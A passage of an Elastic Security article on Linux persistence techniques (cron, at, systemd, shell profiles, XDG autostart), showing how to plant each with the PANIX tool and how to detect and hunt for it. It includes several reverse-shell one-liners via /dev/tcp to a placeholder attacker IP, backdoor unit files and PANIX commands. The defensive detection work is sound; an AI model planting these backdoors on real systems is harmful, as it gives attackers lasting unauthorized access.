[PANIX](https://github.com/Aegrah/PANIX), a Linux persistence tool developed by Ruben Groenewoud of Elastic Security. PANIX simplifies and customizes persistence setup to test your detections.\n\nBy the end of this article, you'll have a solid understanding of each persistence mechanism we describe, including:\n* How it works (theory)\n* How to set it up (practice)\n* How to detect it (SIEM and Endpoint rules)\n* How to hunt for it (ES|QL and OSQuery hunts)\n\nStep into the world of Linux persistence with us, it’s fun!\n\n## What is persistence?\n\nLet’s start with the basics. [Persistence](https://attack.mitre.org/tactics/TA0003/) refers to an attacker's ability to maintain a foothold in a compromised system or network even after reboots, password changes, or other attempts to remove them.\n\nPersistence is crucial for attackers, ensuring extended access to the target environment. This enables them to gather intelligence, understand the environment, move laterally through the network, and work towards achieving their objectives.\n\nGiven that most malware attempts to establish some form of persistence automatically, this phase is critical for defenders to understand. Ideally, attacks should be detected and prevented during initial access, but this is not always possible. Many malware samples also leverage multiple persistence techniques to ensure continued access. Notably, these persistence mechanisms can often be detected with robust defenses in place.\n\nEven if an attack is detected, the initial access vector is patched and mitigated, but any leftover persistence mechanism can allow the attackers to regain access and resume their operations. Therefore, it's essential to monitor the establishment of some persistence mechanisms close to real time and hunt others regularly.\n\nTo support this effort, Elastic utilizes the MITRE ATT&CK framework as the primary lexicon for categorizing techniques in most of our detection artifacts. [MITRE ATT&CK](https://attack.mitre.org/matrices/enterprise/) is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. It is commonly used as a foundation for developing specific threat models and methodologies within the field of cybersecurity. By leveraging this comprehensive framework, we enhance our ability to detect, understand, and mitigate persistent threats effectively.\n\n## Setup\n\nTo ensure you are prepared to detect the persistence mechanisms discussed in this article, [enabling and updating our pre-built detection rules is important](https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#update-prebuilt-rules). If you are working with a custom-built ruleset and do not use all of our pre-built rules, this is a great opportunity to test them and fill in any gaps.\n\nTo install, enable, and update our pre-built rules, follow these steps:\n\n1. Navigate to Kibana → Security → Rules → Detection rules (SIEM).\n2. You will find your installed and potential new and/or updated pre-built rules here.\n3. Use the \"Add Elastic rules\" button to add the latest Elastic pre-built rules.\n4. Use the \"Rule Updates\" tab to update existing rules.\n\nNow, we are ready to get started. \n\n## T1053 - scheduled task/job\n\nAutomating routine tasks is common in Unix-like operating systems for system maintenance. Some common utilities used for task scheduling are [cron](https://www.man7.org/linux/man-pages/man8/cron.8.html) and [at](https://man7.org/linux/man-pages/man1/at.1p.html). MITRE details information related to this technique under the identifier [T1053](https://attack.mitre.org/techniques/T1053/). \n\n### T1053.003 - scheduled task/job: Cron\n\n[Cron](https://www.man7.org/linux/man-pages/man8/cron.8.html) is a utility for scheduling recurring tasks to run at specific times or intervals. It is available by default on most Linux distributions. It is a [daemon](https://man7.org/linux/man-pages/man7/daemon.7.html) (that is, a background process that typically performs tasks without requiring user interaction) that reads cron files from a default set of locations. These files contain commands to run periodically and/or at a scheduled time.\n\nThe scheduled task is called a cron job and can be executed with both user and root permissions, depending on the configuration. Due to its versatility, cron is an easy and stable candidate for Linux persistence, even without escalating to root privileges upon initial access. \n\nThere are user-specific and system-wide cron jobs. The user-specific cron jobs commonly reside in:\n\n* `/var/spool/cron/`\n* `/var/spool/cron/crontabs/`\n\nThe system-wide cron jobs are located in the following:\n\n* `/etc/crontab`\n* `/etc/cron.d/`\n* `/etc/cron.daily/`\n* `/etc/cron.hourly/`\n* `/etc/cron.monthly/`\n* `/etc/cron.weekly/`\n\nThe cron file syntax slightly differs based on the location in which the cron file is created. For the cron files in the `/etc/` directory, the user who will execute the job must be specified.\n\n```\n* * * * * root /bin/bash -c '/srv/backup_tool.sh'\n```\n\nConversely, the user who created the cron files in the `/var/spool/cron/crontabs/` directory will execute the cron files.\n\n```\n* * * * * /bin/bash -c '/srv/backup_tool.sh'\n```\n\nThe asterisks are used to create the schedule. They represent (in order) minutes, hours, days (of the month), months, and days (of the week). Setting “`* * * * *`” means the cron job is executed every minute while setting “`* * 1 12 *`”` `means the cron job is executed every minute on the first day of December. Information on cron scheduling is available at [Crontab Guru](https://crontab.guru/).\n\nAttackers can exploit these jobs to run scripts or binaries that establish reverse connections or add reverse shell commands.\n\n```\n* * * * * root /bin/bash -c 'sh -i >& /dev/tcp/192.168.1.1/1337 0>&1'\n```\n\nMITRE specifies more information and real-world examples related to this technique in [T1053.003](https://attack.mitre.org/techniques/T1053/003/).\n\n#### Persistence through T1053.003 - cron\n\nYou can manually create a system-wide cron file in any of the `/etc/` directories or use the `crontab -e` command to create a user-specific cron file. To more easily illustrate all of the persistence mechanisms presented in these articles, we will use PANIX. Depending on the privileges when running it, you can establish persistence like so:\n\n```\nsudo ./panix.sh --cron --default --ip 192.168.1.1 --port 2001\n[+] Cron job persistence established.\n```\n\nThe default setting for the root user will create a cron file at `/etc/cron.d/freedesktop_timesync1` that calls out to the attacker system every minute. When looking at the events, we can see the following:\n\n\n\nWhen PANIX was executed, the cron job was created, `/usr/sbin/cron` read the contents of the cron file and executed it, after which a network connection was established. Analyzing this chain of events, we can identify several detection capabilities for this and other proof-of-concepts.\n\nElastic SIEM includes over 1,000 prebuilt rules and more than 200 specifically dedicated to Linux. These rules run on the Elastic cluster and are designed to detect threat techniques that are available in our public [detection rules repository](https://github.com/elastic/detection-rules/tree/main). Our prevention capabilities include behavioral endpoint rules and memory/file signatures, which are utilized by Elastic Defend and can be found in our public [protection artifacts repository](https://github.com/elastic/protections-artifacts). \n\n| Category | Coverage |\n|----------|----------------------------------------------------|\n| File | [Cron Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_cron_job_creation.toml) |\n| | [Suspicious File Creation in /etc for Persistence](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_etc_file_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Hidden Payload Executed via Scheduled Job](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_hidden_payload_executed_via_scheduled_job.toml) |\n| | [Scheduled Job Executing Binary in Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_job_executing_binary_in_unusual_location.toml) |\n| | [Scheduled Task Unusual Command Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_task_unusual_command_execution.toml) |\n\nThe file category has three different rules, the first two focusing on creation/modification using Elastic Defend, while the third focuses on modification through [File Integrity Monitoring (FIM)](https://www.elastic.co/docs/current/integrations/fim). FIM can be set up using [Auditbeat](https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-file_integrity.html) or via the Fleet integration. To correctly set up FIM, it is important to specify full paths to the files that FIM should monitor, as it does _not_ allow for wildcards. Therefore, Potential Persistence via File Modification is a rule that requires manual setup and tailoring to your specific needs, as it will require individual entries depending on the persistence technique you are trying to detect.\n\n### T1053.002 - scheduled task/job: at\n\n[At](https://man7.org/linux/man-pages/man1/at.1p.html) is a utility for scheduling one-time tasks to run at a specified time in the future on Linux systems. Unlike cron, which handles recurring tasks, At is designed for single executions. The At daemon (`atd`) manages and executes these scheduled tasks at the specified time.\n\nAn At job is defined by specifying the exact time it should run. Depending on the configuration, users can schedule At jobs with either user or root permissions. This makes At a straightforward option for scheduling tasks without the need for persistent or repeated execution, but less useful for attackers. Additionally, At is not present on most Linux distributions by-default, which makes leveraging it even less trivial. However, it is still used for persistence, so we should not neglect the technique.\n\nAt jobs are stored in `/var/spool/cron/atjobs/`. Besides the At job, At also creates a spool file in the `/var/spool/cron/atspool/` directory. These job files contain the details of the scheduled tasks, including the commands to be executed and the scheduled times. \n\nTo schedule a task using At, you simply provide the command to run and the time for execution. The syntax is straightforward:\n\n```\necho \"/bin/bash -c 'sh -i >& /dev/tcp/192.168.1.1/1337 0>&1'\" | at now + 1 minute\n```\n\nThe above example schedules a task to run one minute from the current time. The time format can be flexible, such as `at 5 PM tomorrow` or `at now + 2 hours`. At job details can be listed using the `atq` command, and specific jobs can be removed using `atrm`.\n\nAt is useful for one-time task scheduling and complements cron for users needing recurring and single-instance task scheduling solutions. MITRE specifies more information and real-world examples related to this technique in [T1053.002](https://attack.mitre.org/techniques/T1053/002/).\n\n#### Persistence through T1053.002 - At\n\nYou can leverage the above command structure or use PANIX to set up an At job. Ensure At is installed on your system and the time settings are correct, as this might interfere with the execution. \n\n```\n./panix.sh --at --default --ip 192.168.1.1 --port 2002 --time 14:49\njob 15 at Tue Jun 11 14:49:00 2024\n[+] At job persistence established.\n```\n\nBy default, depending on the privileges used to run the program, a reverse connection will be established at the time interval the user specified. Looking at the events in Discover:\n\n\n\nWe see the execution of PANIX, which is creating the At job. Next, At(d) creates two files, an At job and an At spool. At the correct time interval, the At job is executed, after which the reverse connection to the attack IP is established. Looking at these events, we have fewer behavioral coverage opportunities than we have for cron, as behaviorally, it is just `/bin/sh` executing a shell command. However, we can still identify the following artifacts:\n\n| Category | Coverage |\n|----------|---------------------------------------------|\n| File | [At Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_at_job_creation.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n\n### T1053 - scheduled task/job: honorable mentions\n\nSeveral other honorable mentions for establishing persistence through scheduled tasks/jobs include [Anacron](https://www.man7.org/linux/man-pages/man8/anacron.8.html), [Fcron](https://man.archlinux.org/man/fcron.8.en), [Task Spooler](https://manpages.ubuntu.com/manpages/xenial/man1/tsp.1.html), and [Batch](https://man7.org/linux/man-pages/man1/batch.1p.html). While these tools are less commonly leveraged by malware due to their non-default installation and limited versatility compared to cron and other mechanisms, they are still worth noting. We include behavioral detection rules for some of these in our persistence rule set. For example, Batch jobs are saved in the same location as At jobs and are covered by our \"[At Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_at_job_creation.toml)\" rule. Similarly, Anacron jobs are covered through our \"[Cron Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_cron_job_creation.toml)\" rule, as Anacron integrates with the default Cron persistence detection setup.\n\n### Hunting for T1053 - scheduled task/job \n\nBesides relying on Elastic’s pre-built [detection](https://github.com/elastic/detection-rules) and [endpoint rules](https://github.com/elastic/protections-artifacts), a defender will greatly benefit from manual threat hunting. As part of Elastic’s 8.14 release, the general availability of the [Elasticsearch Query Language (ES|QL) language](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) was introduced. ES|QL provides a powerful way to filter, transform, and analyze data stored in Elasticsearch. For this use case, we will leverage ES|QL to hunt through all the data in an Elasticsearch stack for traces of cron, At, Anacron, Fcron, Task Spooler,` `and Batch persistence. \n\nWe can leverage the following ES|QL query that can be tailored to your specific environment:\n\nThis query returns 76 hits that could be investigated. Some are related to PANIX, others to real malware detonations, and some are false positives. \n\n\n\nDealing with false positives is crucial, as system administrators and other authorized personnel commonly use these tools. Differentiating between legitimate and malicious use is essential for maintaining an effective security posture. Accurately identifying the intent behind using these tools helps minimize disruptions caused by false alarms while ensuring that potential threats are addressed promptly.\n\nPrograms similar to cron also have an execution history, as all of the scripts it executes will have cron as its parent. This allows us to hunt for unusual process executions through ES|QL:\n\nThis example performs aggregation using a `distinct_count` of `host.id`. If an anomalous entry is observed, `host_count` can be removed, and additional fields such as `host.name` and `user.name` can be added to the by section. This can help find anomalous behavior on specific hosts rather than across the entire environment. This could also be an additional pivoting opportunity if suspicious processes are identified. \n\nIn this case, the query returns 37 results, most of which are true positives due to the nature of the testing stack in which this is executed. \n\n\n\nIn your environment, this will likely return a massive amount of results. You may consider reducing/increasing the number of days that are being searched. Additionally, the total count of entries (cc) and host_count can be increased/decreased to make sense for your environment. Every network is unique; therefore, a false positive in one environment may not be a false positive for every environment. Additionally, the total count of entries (`cc`) and `host_count` can be increased/decreased to make sense for your environment. Every network is unique, and therefore a false-positive in one environment may not be a false-positive in another. Adding exclusions specific to your needs will allow for easier hunting.\n\nBesides ES|QL, we can also leverage Elastic’s [OSQuery Manager integration](https://www.elastic.co/docs/current/integrations/osquery_manager). OSQuery is an open-source, cross-platform tool that uses SQL queries to investigate and monitor the operating system's performance, configuration, and security by exposing system information as a relational database. It allows administrators and security professionals to easily query system data and create real-time monitoring and analytics solutions. Streaming telemetry represents activity over time, while OSQuery focuses on static on-disk presence. This opens the door for detecting low-and-slow/decoupled-style attacks and might catch otherwise missed activity through telemetry hunting. \n\nInformation on how to set up OSQuery can be found in the [Kibana docs](https://www.elastic.co/guide/en/kibana/current/osquery.html), and a blog post explaining OSQuery in depth can be found [here](https://www.elastic.co/blog/gain-upper-hand-over-adversaries-with-osquery-and-elastic). We can run the following live query to display all of the cron files present on a particular system:\n\nThe following results are returned. We can see the `/etc/cron.d/freedesktop_timesync1` with a `file_last_status_change_time` that is recent and differs from the rest of the cron files. This is the backdoor planted by PANIX. \n\n\n\nIf we want to dig deeper, OSQuery also provides a module to read the commands from the crontab file by running the following query:\n\nThis shows us the command, the location of the cron job, and the corresponding schedule at which it runs. \n\n\n\nAnalyzing the screenshot, we see two suspicious reverse shell entries, which could require additional manual investigation. \n\nAn overview of the hunts outlined above, with additional descriptions and references, can be found in our [detection rules repository](https://github.com/elastic/detection-rules), specifically in the [Linux hunting subdirectory](https://github.com/elastic/detection-rules/tree/main/hunting). We can hunt for uncommon scheduled task file creations or unusual process executions through scheduled task executables by leveraging ES|QL and OSQuery. The [Persistence via Cron](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_cron.toml) hunt contains several ES|QL and OSQuery queries to aid this process.\n\n## T1453 - create or modify system process (systemd)\n\n[Systemd](https://man7.org/linux/man-pages/man1/init.1.html) is a system and service manager for Linux, widely adopted as a replacement for the traditional [SysVinit](https://manpages.debian.org/testing/sysvinit-core/init.8.en.html) system. It is responsible for initializing the system, managing processes, and handling system resources. Systemd operates through a series of unit files defining how services should be started, stopped, and managed.\n\n[Unit files](https://manpages.debian.org/jessie/systemd/systemd.unit.5.en.html) have different types, each designed for specific purposes. The Service unit is the most common unit type for managing long-running processes (typically daemons). Additionally, the Timer unit manages time-based activation of other units, similar to cron jobs, but integrated into Systemd. \n\nThis section will discuss [T1453](https://attack.mitre.org/techniques/T1543/) for systemd services and generators, and [T1053](https://attack.mitre.org/techniques/T1053/) for systemd timers.\n\n### T1453.002 - create or modify system process: systemd services\n\nThe [services](https://www.digitalocean.com/community/tutorials/understanding-systemd-units-and-unit-files) managed by systemd are defined by unit files, and are located in default directories, depending on the operating system and whether the service is run system-wide or user-specific. The system-wide unit files are typically located in the following directories:\n\n* `/run/systemd/system/`\n* `/etc/systemd/system/`\n* `/etc/systemd/user/`\n* `/usr/local/lib/systemd/system/`\n* `/lib/systemd/system/`\n* `/usr/lib/systemd/system/`\n* `/usr/lib/systemd/user/`\n\nUser-specific unit files are typically located at:\n\n* `~/.config/systemd/user/`\n* `~/.local/share/systemd/user/`\n\nA basic service unit file consists of three main sections: `[Unit]`, `[Service]`, and `[Install]`, and has the `.service` extension. Here's an example of a simple unit file that could be leveraged for persistence:\n\n```\n[Unit]\nDescription=Reverse Shell\n\n[Service]\nExecStart=/bin/bash -c 'sh -i >& /dev/tcp/192.168.1.1/1337 0>&1'\n\n[Install]\nWantedBy=multi-user.target\n```\n\nThis unit file would attempt to establish a reverse shell connection every time the system boots, running with root privileges. More information and real-world examples related to systemd services are outlined by MITRE in [T1543.002](https://attack.mitre.org/techniques/T1543/002/).\n\nRelying solely on persistence upon reboot might be too restrictive. Timer unit files can be leveraged to overcome this limitation to ensure persistence on a predefined schedule.\n\n### T1053.006 - scheduled task/job: systemd timers\n\n[Timer units](https://wiki.archlinux.org/title/systemd/Timers) provide a versatile method to schedule tasks, similar to cron jobs but more integrated with the Systemd ecosystem. A timer unit specifies the schedule and is associated with a corresponding service unit that performs the task. Timer units can run tasks at specific intervals, on specific dates, or even based on system events.\n\nTimer unit files are typically located in the same directories as the service unit files and have a `.timer` extension. Coupling timers to services is done by leveraging the same unit file name but changing the extension. An example of a timer unit file that would activate our previously created service every hour can look like this:\n\n```\n[Unit]\nDescription=Obviously not malicious at all\n\n[Timer]\nOnBootSec=1min\nOnUnitActiveSec=1h\n\n[Install]\nWantedBy=timers.target\n```\n\nTimers are versatile and allow for different scheduling options. Some examples are `OnCalendar=Mon,Wed,Fri 17:00:00` to run a service every Monday, Wednesday, and Friday at 5:00 PM, and `OnCalendar=*-*-* 02:30:00` to run a service every day at 2:30 AM. More details and real world examples related to Systemd timers are presented by MITRE in [T1053.006](https://attack.mitre.org/techniques/T1053/006/).\n\n### T1453 - create or modify system process: systemd generators\n\n[Generators](https://manpages.debian.org/testing/systemd/systemd.generator.7.en.html) are small executables executed by systemd at bootup and during configuration reloads. Their main role is to convert non-native configuration and execution parameters into dynamically generated unit files, symlinks, or drop-ins, extending the unit file hierarchy for the service manager.\n\nSystem and user generators are loaded from the `system-generators`/ and `user-generators`/ directories, respectively, with those listed earlier overriding others of the same name. Generators produce output in three priority-based directories: `generator.early` (highest), `generator` (medium), and `generator.late` (lowest). Reloading daemons will re-run all generators and reload all units from disk.\n\nSystem-wide generators can be placed in the following directories:\n\n* `/run/systemd/system-generators/`\n* `/etc/systemd/system-generators/`\n* `/usr/local/lib/systemd/system-generators/`\n* `/lib/systemd/system-generators/`\n* `/usr/lib/systemd/system-generators/`\n\nUser-specific generators are placed in the following directories:\n\n* `/run/systemd/user-generators/`\n* `/etc/systemd/user-generators/`\n* `/usr/local/lib/systemd/user-generators/`\n* `/lib/systemd/user-generators/`\n* `/usr/lib/systemd/user-generators/`\n\n[Pepe Berba's research](https://pberba.github.io/security/2022/02/07/linux-threat-hunting-for-persistence-systemd-generators/) explores using systemd generators to establish persistence. One method involves using a generator to create a service file that triggers a backdoor on boot. Alternatively, the generator can execute the backdoor directly, which can cause delays if the network service is not yet started, alerting the user. Systemd generators can be binaries or shell scripts. For example, a payload could look like this:\n\n```\n#!/bin/sh\n# Create a systemd service unit file in the late directory\ncat <<-EOL > \"/run/systemd/system/generator.service\"\n[Unit]\nDescription=Generator Service\n\n[Service]\nExecStart=/usr/lib/systemd/system-generators/makecon\nRestart=always\nRestartSec=10\n\n[Install]\nWantedBy=multi-user.target\nEOL\n\nmkdir -p /run/systemd/system/multi-user.target.wants/\nln -s /run/systemd/system/generator.service /run/systemd/system/multi-user.target.wants/generator.service\n\n# Ensure the script exits successfully\nexit 0\n```\n\nWhich creates a new service (`generator.service`), which in turn executes `/usr/lib/systemd/system-generators/makecon` on boot. As this method creates a service (albeit via a generator), we will take a closer look at systemd service persistence. Let's examine how these work in practice.\n\n### Persistence through T1453/T1053 - systemd services, timers and generators\n\nYou can manually create the unit file in the appropriate directory, reload the daemon, enable and start the service, or use PANIX to do that for you. PANIX will create a service unit file in the specified directory, which in turn runs the custom command at a one-minute interval through a timer unit file. You can also use `--default` with` --ip`, `--port,` and `–-timer`.\n\n```\nsudo ./panix.sh --systemd --custom --path /etc/systemd/system/panix.service --command \"/usr/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.1/2003 0>&1'\" --timer\nService file created successfully!\nCreated symlink /etc/systemd/system/default.target.wants/panix.service → /etc/systemd/system/panix.service.\nTimer file created successfully!\nCreated symlink /etc/systemd/system/timers.target.wants/panix.timer → /etc/systemd/system/panix.timer.\n[+] Persistence established. \n```\n\nWhen a service unit is enabled, systemd creates a symlink in the `default.target.wants/` directory (or another appropriate target directory). This tells systemd to start the `panix.service` automatically when the system reaches the `default.target`. Similarly, the symlink for the timer unit file tells systemd to activate the timer based on the schedule defined in the timer unit file.\n\nWe can analyze and find out what happened when looking at the documents in Kibana: \n\n\n\nPANIX is executed, which creates the `panix.service` and `panix.timer` units in the corresponding directories. Then, `systemctl` is used to reload the daemons, after which the `panix.timer` is enabled and started, enabling systemd to run the `ExecStart` section of the service unit (which initiates the outbound network connection) every time the timer hits. To detect potential systemd persistence, we leverage the following behavioral rules:\n\n| Category | Coverage |\n|----------|----------------------------------------------------|\n| File | [Systemd Service Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_service_creation.toml) |\n| | [Systemd Timer Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_scheduled_timer_created.toml) |\n| | [Systemd Generator Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_generator_creation.toml) |\n| | [Suspicious File Creation in /etc for Persistence](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_etc_file_creation.toml) |\n| Process | [Systemd Service Started by Unusual Parent Process](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_service_started.toml) |\n| | [Hidden Payload Executed via Scheduled Job](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_hidden_payload_executed_via_scheduled_job.toml) |\n| | [Scheduled Job Executing Binary in Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_job_executing_binary_in_unusual_location.toml) |\n| | [Scheduled Task Unusual Command Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_task_unusual_command_execution.toml) |\n\n### Hunting for T1053/T1453 - systemd services, timers and generators\n\nWe can hunt for uncommon `service`/`timer`/`generator` file creations in our environment through systemd by leveraging ES|QL and OSQuery. The [Persistence via Systemd (Timers)](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_systemd_timers.toml) file contains several ES|QL and OSQuery queries that can help hunt for these types of persistence.\n\n## T1546.004 - event triggered execution: Unix shell configuration modification\n\n[Unix shell configuration files](https://effective-shell.com/part-5-building-your-toolkit/configuring-the-shell/) are scripts that run throughout a user session based on events (e.g., log in/out, or open/close a shell session). These files are used to customize the shell environment, including setting environment variables, aliases, and other session-specific settings. As these files are executed via a shell, they can easily be leveraged by attackers to establish persistence on a system by injecting backdoors into these scripts. \n\nDifferent shells have their own configuration files. Similarly to cron and systemd, this persistence mechanism can be established with both user and root privileges. Depending on the shell, system-wide shell configuration files are located in the following locations and require root permissions to be changed:\n\n* `/etc/profile`\n* `/etc/profile.d/`\n* `/etc/bash.bashrc`\n* `/etc/bash.bash_logout`\n\nUser-specific shell configuration files are triggered through actions performed by and executed in the user's context. Depending on the shell, these typically include:\n\n* `~/.profile`\n* `~/.bash_profile`\n* `~/.bash_login`\n* `~/.bash_logout`\n* `~/.bashrc`\n\nOnce modified, these scripts ensure malicious commands are executed for every user login or logout. These scripts are executed in a [specific order](https://www.thegeekstuff.com/2008/10/execution-sequence-for-bash_profile-bashrc-bash_login-profile-and-bash_logout/). When a user logs in via SSH, the order of execution for the login shells is:\n\n1. `/etc/profile`\n2. `~/.bash_profile` (if it exists, otherwise)\n3. `~/.bash_login` (if it exists, otherwise)\n4. `~/.profile` (if it exists)\n\nFor non-login interactive shell initialization, `~/.bashrc` is executed. Typically, to ensure this configuration file is also executed on login, `~/.bashrc` is sourced within `~/.bash_profile`, `~/.bash_login` or `~/.profile`. Additionally, a backdoor can be added to the `~/.bash_logout` configuration file for persistence upon shell termination. \n\nWhen planting a backdoor in one of these files, it is important not to make mistakes in the execution chain, meaning that it is both important to pick the correct configuration file and to pick a fitting payload. A typical reverse shell connection will make the terminal freeze while sending the reverse shell connection to the background will make it malfunction. A potential payload could look like this:\n\n```\n(nohup bash -i > /dev/tcp/192.168.1.1/1337 0<&1 2>&1 &)\n```\n\nThis command uses “nohup” (no hang up) to run an interactive bash reverse shell as a background process, ensuring it continues running even after the initiating user logs out. The entire command is then executed in the background using `&` and wrapped in parentheses to create a subshell, preventing any interference with the parent shell’s operations.\n\nBe vigilant for other types of backdoors, such as credential stealers that create fake “`[sudo] password for…`” prompts when running sudo or the execution of malicious binaries. MITRE specifies more information and real-world examples related to this technique in [T1546.004](https://attack.mitre.org/techniques/T1546/004/).\n\n### Persistence through T1546.004 - shell profile modification\n\nYou can add a bash payload to shell configuration files either manually or using PANIX. When PANIX runs with user privileges, it establishes persistence by modifying `~/.bash_profile`. With root privileges, it modifies the `/etc/profile` file to achieve system-wide persistence.\n\n```\nsudo ./panix.sh --shell-profile --default --ip 192.168.1.1 --port 2004\n```\n\nTo trigger it, either log in as root via the shell with `su --login root` or login via SSH. The shell profile will be parsed and executed in order, resulting in the following chain of execution:\n\n\n\nPANIX plants the backdoor in `/etc/profile`, next `su --login root` is executed to trigger the payload, the `UID`/`GID` changes to root, and a network connection is initiated through the injected backdoor. A similar process occurs when logging in via SSH. We can detect several steps of the attack chain. \n\nDetection and endpoint rules that cover shell profile modification persistence_\n\n| Category | Coverage |\n|----------|--------------------------------------------------------------|\n| File | [Shell Configuration Creation or Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_shell_configuration_modification.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Process | [Binary Execution from Unusual Location through Shell Profile](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_binary_execution_from_unusual_location_through_shell_profile.toml) |\n| Network | [Network Connection through Shell Profile](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_network_connection_through_shell_profile.toml) |\n\n### Hunting for T1546.004 - shell configuration modification\n\nWe can hunt for shell profile file creations/modification, as well as SSHD child processes, by leveraging ES|QL and OSQuery. The [Shell Modification Persistence](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_shell_modification_persistence.toml) hunting rule contains several of these hunting queries.\n\n## T1547.013 - boot or logon autostart execution: XDG autostart entries\n\nCross-Desktop Group (XDG) is a set of[ standards for Unix desktop environments](https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html) that describe how applications should be started automatically when a user logs in. The XDG Autostart specification is particularly interesting, as it defines a way to automatically launch applications based on desktop entry files, which are plain text files with the `.desktop` extension.\n\nThe `.desktop` files are typically used to configure how applications appear in menus and how they are launched. By leveraging XDG Autostart, attackers can configure malicious applications to run automatically whenever users log into their desktop environment.\n\nThe location where these files can be placed varies based on whether the persistence is being established for all users (system-wide) or a specific user. It also depends on the desktop environment used; for example, KDE has other configuration locations than Gnome. Default system-wide autostart files are located in directories that require root permissions to modify, such as:\n\n* `/etc/xdg/autostart/`\n* `/usr/share/autostart/`\n\nDefault user-specific autostart files, other than the root user-specific autostart file, only require user-level permissions. These are typically located in:\n\n* `~/.config/autostart/`\n* `~/.local/share/autostart/`\n* `~/.config/autostart-scripts/ (not part of XDG standard, but used by KDE)`\n* `/root/.config/autostart/*`\n* `/root/.local/share/autostart/`\n* `/root/.config/autostart-scripts/`\n\nAn example of a `.desktop` file that executes a binary whenever a user logs in looks like this:\n\n```\n[Desktop Entry]\nType=Application\nExec=/path/to/malicious/binary\nHidden=false\nNoDisplay=false\nX-GNOME-Autostart-enabled=true\nName=Updater\n```\n\nVolexity recently published research on [DISGOMOJI](https://www.volexity.com/blog/2024/06/13/disgomoji-malware-used-to-target-indian-government/) malware, which was found to establish persistence by dropping a `.desktop` file in the `~/.config/autostart/` directory, which would execute a malicious backdoor planted on the system. As it can be established with both user/root privileges, it is an interesting candidate for automated persistence implementations. Additionally, more information and real-world examples related to this technique are specified by MITRE in [T1547.013](https://attack.mitre.org/techniques/T1547/013/).\n\n### Persistence through T1547.013 - Cross-Desktop Group (XDG)\n\nYou can determine coverage and dynamically analyze this technique manually or through PANIX. When analyzing this technique, make sure XDG is available on your testing system, as it is designed to be used on systems with a GUI (XDG can also be used without a GUI). When PANIX runs with user privileges, it establishes persistence by modifying `~/.config/autostart/user-dirs.desktop` to execute `~/.config/autostart/.user-dirs` and achieve user-specific persistence. With root privileges, it modifies `/etc/xdg/autostart/pkc12-register.desktop` to execute `/etc/xdg/pkc12-register` and achieve system-wide persistence.\n\n```\nsudo ./panix.sh --xdg --default --ip 192.168.1.1 --port 2005\n[+] XDG persistence established.\n```\n\nAfter rebooting the system and collecting the logs, the following events will be present for a GNOME-based system.\n\n\n\nWe can see PANIX creating the `/etc/xdg/autostart` directory and the `pkc12-register/pkc12-register.desktop` files. It grants execution privileges to the backdoor script, after which persistence is established. When the user logs in, the `.desktop` files are parsed, and `/usr/libexec/gnome-session-binary` executes its contents, which in turn initiates the reverse shell connection. Here, again, we can detect several parts of the attack chain. \n\n| Category | Coverage |\n|----------|-------------------------------------------------------------------|\n| File | [Persistence via KDE AutoStart Script or Desktop File Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_kde_autostart_modification.toml) |\n| | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |\n| Network | [Network Connections Initiated Through XDG Autostart Entry](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_xdg_autostart_netcon.toml) |\n\nAgain, the file category has two different rules: the former focuses on creation/modification using Elastic Defend, while the latter focuses on modification through FIM.\n\n### Hunting for T1547.013 - XDG autostart entries\n\nHunting for persistence through XDG involves XDG `.desktop` file creations in known locations and unusual child processes spawned from a session-manager parent through ES|QL and OSQuery. The [XDG Persistence](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_xdg_autostart_modifications.toml) hunting rule contains several queries to hunt for XDG persistence.\n\n## T1548.001 - abuse elevation control mechanism: setuid and setgid\n\n[Set Owner User ID (SUID)](https://man7.org/linux/man-pages/man2/setuid.2.html) and [Set Group ID (SGID)](https://man7.org/linux/man-pages/man2/setgid.2.html) are Unix file permissions allowing users to run executables with the executable’s owner or group permissions, respectively. When the SUID bit is set on an executable owned by the root user, any user running the executable gains root privileges. Similarly, when the SGID bit is set on an executable, it runs with the permissions of the group that owns the file. \n\nTypical targets for SUID and SGID backdoors include common system 